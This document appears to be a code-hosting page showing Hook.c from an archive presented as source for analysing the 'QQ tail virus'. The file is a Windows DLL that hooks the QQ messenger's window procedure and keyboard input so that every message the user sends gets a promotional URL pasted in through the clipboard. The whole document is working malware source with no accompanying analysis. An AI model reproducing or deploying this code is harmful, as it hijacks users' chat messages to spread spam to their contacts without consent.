“QQ尾巴病毒”分析源代码.zip Hook.c

www.pudn.com > “QQ尾巴病毒”分析源代码.zip > Hook.c
#include  
#define QQTAILAPI __declspec(dllexport) 
#include "Hook.h" 
// 定义共享数据段 
#pragma data_seg("shared") 
HHOOK g_hProc = NULL; // 窗口过程钩子句柄 
HHOOK g_hKey = NULL; // 键盘钩子句柄 
HWND g_hRich = NULL; // 文本框句柄 
#pragma data_seg() 
#pragma comment(linker, "/section:shared,rws") 
// DLL句柄 
HINSTANCE g_hInstDLL = NULL; 
// 我的“尾巴” 
TCHAR g_str[] = "欢迎来我的小站坐坐：http://titilima.nease.net"; 
// 函数功能：向文本框中粘贴尾巴 
void PasteText(HWND hRich) 
{ 
  HGLOBAL hMem; 
  LPTSTR pStr; 
  // 分配内存空间 
  hMem = GlobalAlloc(GHND | GMEM_SHARE, sizeof(g_str)); 
  pStr = GlobalLock(hMem); 
  lstrcpy(pStr, g_str); 
  GlobalUnlock(hMem); 
  OpenClipboard(NULL); 
  EmptyClipboard(); 
  // 设置剪贴板文本 
  SetClipboardData(CF_TEXT, hMem); 
  CloseClipboard(); 
  // 释放内存空间 
  GlobalFree(hMem); 
  // 粘贴文本 
  SendMessage(hRich, WM_PASTE, 0, 0); 
} 
// 钩子过程，监视“发送”的命令消息 
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam) 
{ 
  CWPSTRUCT *p = (CWPSTRUCT *)lParam; 
  // 捕获“发送”按钮 
  if (p->message == WM_COMMAND && LOWORD(p->wParam) == 1) 
    PasteText(g_hRich); 
  return CallNextHookEx(g_hProc, nCode, wParam, lParam); 
} 
// 键盘钩子过程，监视“发送”的热键消息 
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) 
{ 
  // 捕获热键消息 
  if (wParam == VK_RETURN && GetAsyncKeyState(VK_CONTROL) < 0 && lParam >= 0) 
    PasteText(g_hRich); 
  return CallNextHookEx(g_hKey, nCode, wParam, lParam); 
} 
// 挂接钩子 
BOOL WINAPI SetHook(HWND hQQ) 
{ 
  BOOL bRet = FALSE; 
  if (hQQ != NULL) 
  { 
    DWORD dwThreadID = GetWindowThreadProcessId(hQQ, NULL); 
    // 感谢好友hottey的查找代码，省去了我使用Spy++的麻烦 
    g_hRich = GetWindow(GetDlgItem(hQQ, 0), GW_CHILD); 
    if (g_hRich == NULL) 
      return FALSE; 
    // 挂接钩子 
    g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID); 
    g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID); 
    bRet = (g_hProc != NULL) && (g_hKey != NULL); 
  } 
  else 
  { 
    // 卸载钩子 
    bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey); 
    g_hProc = NULL; 
    g_hKey = NULL; 
    g_hRich = NULL; 
  } 
  return bRet; 
} 
// DLL主函数 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 
{ 
  if (fdwReason == DLL_PROCESS_ATTACH) 
    g_hInstDLL = hinstDLL; 
  return TRUE; 
}